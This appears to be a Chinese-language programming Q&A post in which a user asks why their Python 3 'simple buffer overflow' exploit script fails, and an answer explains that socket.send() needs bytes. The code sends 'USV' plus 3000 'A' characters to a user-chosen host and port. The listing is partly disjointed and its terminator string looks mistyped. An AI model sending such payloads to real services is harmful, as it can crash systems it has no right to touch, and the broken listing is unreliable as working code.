我最近一直在研究某个人的项目。在尝试导入一个简单的缓冲区溢出漏洞利用时,我遇到了一个始终找不到解决办法的问题。我在 StackOverflow 上搜索过,也问过 LiveOverflow(嘿,为了一个关于溢出的问题,去找了两个“Overflow”要答案)。下面是溢出的代码和两张带有错误信息的图片。
import sys
import socket
def cmdline():
    # RED is defined outside this excerpt; presumably a terminal colour
    # escape sequence written before the prompt is shown -- confirm.
    sys.stdout.write(RED)
    # Read one command line from the user. The value is only bound to a
    # local name here; the branches that compare cmdinput appear later in
    # the listing as a separate excerpt.
    cmdinput = input("NSEFW >> ") #<---- PS1
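def ExploitSimpleBufferOverflow():
    """Send one oversized "USV" request to a TCP service chosen by the user.

    The host and port are first read interactively; ``-s <host>`` and
    ``-p <port>`` on the command line, when present, override those answers.
    The payload is the ASCII prefix ``USV``, 3000 ``A`` (0x41) characters and
    the terminator string exactly as written in the original listing.

    Raises:
        ValueError: if the port (typed or given with ``-p``) is not an integer.
        OSError: if connecting or sending fails.
    """
    # CYAN2 and RESET are defined outside this excerpt.
    sys.stdout.write(CYAN2)
    host = input("Enter the host IP: ")
    port = int(input("Enter the host port: "))
    sys.stdout.write(RESET)

    # Command-line overrides for the interactive answers.
    for carg in sys.argv:
        if carg not in ("-s", "-p"):
            continue
        argnum = sys.argv.index(carg) + 1
        if argnum >= len(sys.argv):
            # A flag given as the last argument has no value; keep the
            # interactive answer instead of raising IndexError.
            continue
        if carg == "-s":
            host = sys.argv[argnum]
        else:
            # argv entries are always str, but connect() needs an int port.
            port = int(sys.argv[argnum])

    buffer = "\x41" * 3000
    # Python 3 sockets accept bytes only, so the complete request (prefix,
    # filler and terminator) is encoded once before it is sent.
    # NOTE(review): the terminator is kept exactly as written, i.e. with
    # forward slashes rather than backslash escape sequences.
    payload = ("USV" + buffer + "//r//n//r").encode('utf-8')

    # The context manager closes the socket even when connect()/send() raise;
    # the original `s.close` named the method without calling it.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, port))
        s.send(payload)
    print('Exploit send succesfully.\n', end="")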
#Lists all available exploits.
elif cmdinput.lower() == "list exploits":
sys.stdout.write(RESET)
print('\n\nto use an exploit, type "use <name>"\n', end="")
print(' \n', end="")
sys.stdout.write(WHITE)
print('\nSimple_Buffer_Overflow (esbo) ', end="")
sys.stdout.write(RED)
print('[M] ', end="")
sys.stdout.write(BLUE)
print('[D]', end="")
print(' \n', end="")
#Callout for SimpleBufferOverflow exploit.
elif cmdinput.lower() == "use exploit_simple_buffer_overflow":
ExploitSimpleBufferOverflow()
elif cmdinput.lower() == "use esbo":
ExploitSimpleBufferOverflow()
答案 0 :(得分:1)
不仅 buffer 需要是字节类型,头部和尾部字符串也需要。在 Python 3 中,socket.send() 只接受字节对象,传入 str 会引发 TypeError。这应该有效:
# Python 3 sockets send bytes only, so the whole str payload (prefix, filler
# and terminator) is concatenated first and encoded in a single step.
s.send(("USV" + buffer + "//r//n//r").encode('utf-8'))